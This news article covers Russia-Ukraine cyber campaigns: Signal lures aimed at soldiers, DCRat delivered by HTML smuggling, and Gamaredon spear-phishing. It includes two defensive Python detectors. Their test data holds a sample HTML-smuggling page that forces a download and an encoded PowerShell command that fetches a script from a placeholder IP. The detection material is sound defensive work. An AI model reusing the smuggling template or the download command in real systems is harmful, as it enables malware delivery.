Ukraine-Russia Cyber Battles Tip Over Into the Real World
"Pig butchering," generative AI, and spear-phishing have all transformed digital warfare.
October 3, 2024
As the kinetic war between Russia and Ukraine persists, a parallel battle is being waged in cyberspace, where hackers are targeting critical infrastructure, government entities, and individual service personnel.
The cyber campaigns focus on espionage, disruption, and social engineering to weaken Ukrainian defenses and sow discord, with efforts to compromise personal data and infiltrate secure communication channels like Signal and Telegram.
Russian-aligned cyber actors, including advanced persistent threat (APT) groups like Gamaredon, have intensified their attacks since Russia's 2022 invasion of Ukraine.
According to the September report from Ukraine's State Service of Special Communications and Information Protection (SSSCIP), Russian operators continue to refine their tooling despite Ukrainian efforts to bolster cybersecurity, and their tactics remain varied and persistent.
What follows are a few of the latest examples of cyberwarfare between the two states; other malware operators and cyberattack units, including Sandworm (aka APT44), remain active alongside them.
Messaging Apps Target Service Members
One recent campaign involves the Russia-aligned UAC-0184 group targeting Ukrainian military personnel through messaging apps, including Signal.
Hackers impersonate familiar contacts, sending malicious files disguised as combat footage or recruitment material to infect devices with malware.
Dan Black, manager, Mandiant Cyber Espionage Analysis, Google Cloud, says common technologies like smartphones and tablets have become essential tools for military personnel on the front lines, providing real-time intelligence and other critical support capabilities.
"But their utility cuts both ways," he cautions.
Because the devices provide such valuable capability, penetrating them can give an adversary a surreptitious lens into sensitive battlefield information, with grave, even lethal, consequences for the targets.
Abu Qureshi, head of threat research for BforeAI, explains targeted cyberattacks aimed at military personnel through messaging apps can severely compromise operational security.
"By intercepting communications or distributing malware through trusted communication channels, attackers can extract sensitive data on the physical locations of personnel," Qureshi says. "This can lead to real-world consequences."
Malachi Walker, security adviser for DomainTools, adds that the targeted attacks seen in the Russia-Ukraine war resemble the pig-butchering scams his team has observed in the financial services sector, where an attacker builds a personal relationship with the victim, gaining trust over a period of time before extracting a payout.
"Seeing this tactic used in warfare, rather than for financial gain, impacts the operational security of a military unit," Walker explains.
He says that while a financially motivated pig-butchering attack may claim a single victim, the same technique in a war setting could endanger an entire group of soldiers.
Adam Gavish, co-founder and CEO at DoControl, says what's particularly concerning is that many of these troops have access to sensitive intelligence and critical systems.
"A successful attack could potentially compromise not just individual soldiers, but entire military operations or strategies," he says.
The ripple effects of a single breach could harm many, making these personalized attacks especially dangerous.
"All of this can significantly impact combat effectiveness, readiness, and overall military capabilities," Gavish says.
Russian-Speaking Users Targeted
Meanwhile, the DCRat (DarkCrystal RAT) Trojan has been deployed through HTML smuggling, marking a shift in delivery method to target Russian-speaking users.
In HTML smuggling, the payload never crosses the network perimeter as a file: it travels as encoded text (typically base64) inside an HTML attachment or page, and JavaScript in the recipient's browser decodes it, rebuilds it as a Blob, and triggers the download locally. Gateways that inspect attachments for executable content see only HTML and script, which is why the technique bypasses traditional security measures and poses a significant threat to critical industries during conflicts.
Walker explains the use of HTML smuggling may not be the sole cause for change in the threat landscape, but it is indicative of an ongoing change that his team has observed in the past two years.
"The evolution of cyberattacks and malware, particularly those that have an intersection with the use of generative AI, have lowered the barrier for entry for threat actors, leading to more threats and a greater volume of attacks," he says.
A remote access trojan like DCRat gives an operator persistent control of the infected host, and from there a path toward systems controlling power grids, oil pipelines, and even nuclear facilities, with severe consequences for public safety. "In the context of targeting Russian-speaking users and Russian companies, such attacks could have an impact that extends to other countries and companies and leads to further distrust," Walker adds.
He notes that not all Russian companies are sanctioned by NATO-allied countries, and the unsanctioned ones could be the most appealing targets, since compromising them would let these threat actors extend their reach.
The effects can be global, including delays in the delivery of essential goods and the compromise of critical industries such as energy, healthcare, financial services, and transportation.
Stephen Kowski, field chief technology officer (CTO) at SlashNext Email Security+, says this method of attack highlights the need for more sophisticated defense strategies that go beyond conventional antivirus solutions.
"When looking at this phishing technique you need live analysis of malicious content within the file and that is why you cannot rely on signature-based, feeds-based phishing protection alone," he explains.
He adds securing industrial control systems is paramount in preventing disruptions that could amplify physical attacks.
"A comprehensive approach involving regular security audits, network segmentation, and robust access controls can help safeguard energy infrastructure against supply chain attacks," Kowski says.
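Kowski's point that signature feeds alone miss this delivery method is easier to see with a concrete triage step. The Python below is an added example, not code from the article or from any vendor quoted in it: it scans an HTML attachment for the client-side reconstruction pattern (base64 text, `atob`, `new Blob`, `URL.createObjectURL` or `msSaveOrOpenBlob`, a forced download) and sniffs the magic bytes of any large base64 run. Both sample pages and the payload (a dummy "MZ" header plus zero padding) are constructed for the example.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators (added example)."""
import base64
import re
from typing import Dict, List, Optional

# Constructed dummy payload: a PE-like header followed by zero padding, not malware.
PAYLOAD_B64 = base64.b64encode(b"MZ" + b"\x00" * 600).decode()

# Constructed smuggling page: the browser, not the gateway, rebuilds the file.
SMUGGLING_HTML = f"""<html><body><script>
var data = "{PAYLOAD_B64}";
var bytes = Uint8Array.from(atob(data), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "Invoice_2024.iso";
document.body.appendChild(a);
a.click();
</script></body></html>"""

# Constructed benign page: an inline image is base64 too, but nothing rebuilds a file.
BENIGN_HTML = """<html><body><h1>Quarterly report</h1>
<p>Figures are in the attached PDF.</p>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUg=="></body></html>"""

JS_INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "blob_constructor": re.compile(r"\bnew\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "ms_save_blob": re.compile(r"msSave(?:OrOpen)?Blob\s*\(", re.I),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']", re.I),
    "auto_click": re.compile(r"\.click\s*\(\s*\)", re.I),
}
# A base64 run this long inside an HTML file is worth a look on its own. The
# threshold is an assumption; inline images and fonts are legitimate base64.
BIG_BASE64 = re.compile(r"[A-Za-z0-9+/]{400,}={0,2}")
MAGIC = {b"MZ": "pe_executable", b"PK": "zip_or_office",
         b"\xd0\xcf\x11\xe0": "ole_document", b"%PDF": "pdf"}


def sniff_blob(b64: str) -> Optional[str]:
    """Decode only the first 64 base64 chars (48 bytes) to identify the file type."""
    try:
        head = base64.b64decode(b64[:64], validate=True)
    except ValueError:
        return None
    for sig, name in MAGIC.items():
        if head.startswith(sig):
            return name
    return "unknown"


def scan_html(html: str) -> Dict[str, object]:
    """Return the indicators found, the embedded blob types, and a verdict."""
    hits: List[str] = [name for name, rx in JS_INDICATORS.items() if rx.search(html)]
    blobs = BIG_BASE64.findall(html)
    types = [sniff_blob(b) for b in blobs]
    rebuilds_file = "blob_constructor" in hits or "ms_save_blob" in hits
    delivers_file = "object_url" in hits or "download_attr" in hits or "ms_save_blob" in hits
    suspicious = bool(blobs) and rebuilds_file and delivers_file
    if "pe_executable" in types:  # an executable header inside HTML text is enough by itself
        suspicious = True
    return {"indicators": hits, "blob_count": len(blobs), "blob_types": types,
            "verdict": "suspicious" if suspicious else "clean"}


if __name__ == "__main__":
    for label, page in (("smuggling", SMUGGLING_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html(page))
```

The caveat is the reason for Kowski's "live analysis" remark: an attacker who splits the blob into chunks, XORs it, or builds the byte array arithmetically defeats every regex above while the browser still produces the same file. Static triage like this is a cheap first pass; the robust check is to render the HTML in a sandbox and inspect whatever it writes to disk.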
Game on for Gamaredon
An ESET report released last month focused on the 2022 and 2023 campaigns of Gamaredon, one of the most active groups in Ukraine.
The group has been conducting spear-phishing campaigns and using custom malware to breach Ukrainian government institutions, with the attacks undergoing constant evolution — for example, shifting to PowerShell and VBScript-based attacks.
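A shift from document macros to PowerShell and VBScript delivered by spear-phishing is best caught on process lineage rather than file hashes, which change with every campaign. The following is an added example, not from ESET's report and not Gamaredon's tooling: it runs a few lineage and command-line rules over process-creation events in a Sysmon Event ID 1-like shape (the field names `ParentImage`, `Image`, `CommandLine` are assumed) and decodes any `-EncodedCommand` argument. All events, paths and the encoded command are constructed for the example.

```python
"""Detection logic for script-based spear-phishing payload execution (added example)."""
import base64
import ntpath
import re
from typing import Dict, Iterable, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Lure files named like documents but executed as scripts, e.g. Order.pdf.vbs
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|jpe?g|png|txt)\.(?:vbs|vbe|js|jse|hta|wsf)\b", re.I)
HIDDEN = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.I)
FLAG_ARG = re.compile(r"-([A-Za-z]+)\s+(\S+)")

# Constructed: a typical second-stage launcher (documentation IP, not a real host).
ENCODED = base64.b64encode(
    r"Invoke-WebRequest 'http://198.51.100.7/s' -OutFile $env:TEMP\s.vbs".encode("utf-16le")
).decode()

# Constructed sample events; the last one is ordinary admin noise and must not alert.
EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Users\u\AppData\Local\Temp\Order.pdf.vbs'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None.

    powershell.exe accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...),
    so match the prefix rather than a fixed spelling. The value is base64 of UTF-16LE.
    """
    for flag, value in FLAG_ARG.findall(cmdline):
        f = flag.lower()
        if f == "ec" or (f.startswith("e") and "encodedcommand".startswith(f)):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def evaluate(event: Dict[str, str]) -> Dict[str, object]:
    """Apply the rules to one event and return the rules that fired."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    rules: List[str] = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS | SHELLS:
        rules.append("office_spawned_script_host")
    if parent in SCRIPT_HOSTS and child in SHELLS:
        rules.append("script_host_spawned_shell")
    if DOUBLE_EXT.search(cmd):
        rules.append("double_extension_script")
    if child in SHELLS and HIDDEN.search(cmd):
        rules.append("hidden_window")
    decoded = decode_encoded_command(cmd) if child in {"powershell.exe", "pwsh.exe"} else None
    if decoded is not None:
        rules.append("encoded_command")
    return {"image": child, "parent": parent, "rules": rules, "decoded_command": decoded}


def alerts(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events on which at least one rule fired."""
    return [r for r in (evaluate(e) for e in events) if r["rules"]]


if __name__ == "__main__":
    for a in alerts(EVENTS):
        print(a["parent"], "->", a["image"], a["rules"], a["decoded_command"])
```

The lineage rules are deliberately coarse: an Office process spawning a script host, or a script host spawning PowerShell, is rare in legitimate use and survives retooling of the scripts themselves. Scheduled-task PowerShell launched from svchost.exe with `-File` is left alone here because it is common administrative activity; treat that as an environment-specific tuning decision rather than a fixed rule.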
DoControl's Gavish says Gamaredon's persistent approach, while less stealthy, can be highly effective in overwhelming Ukraine's defenses through sheer volume.
"This constant barrage of attacks ties up cybersecurity resources and increases the chances of a successful breach simply through persistence," he says. The real-world impact forces Ukraine to constantly divert resources to cyber defense. "Gamaredon's attempts to target NATO countries have significant implications for international cybersecurity cooperation," Gavish adds.
From his perspective, these types of threats highlight the need for increased information sharing and joint defense strategies among allied nations. "The situation in Ukraine serves as a stark reminder that cybersecurity is not just an IT issue — it's a matter of national security with very real-world consequences," Gavish says.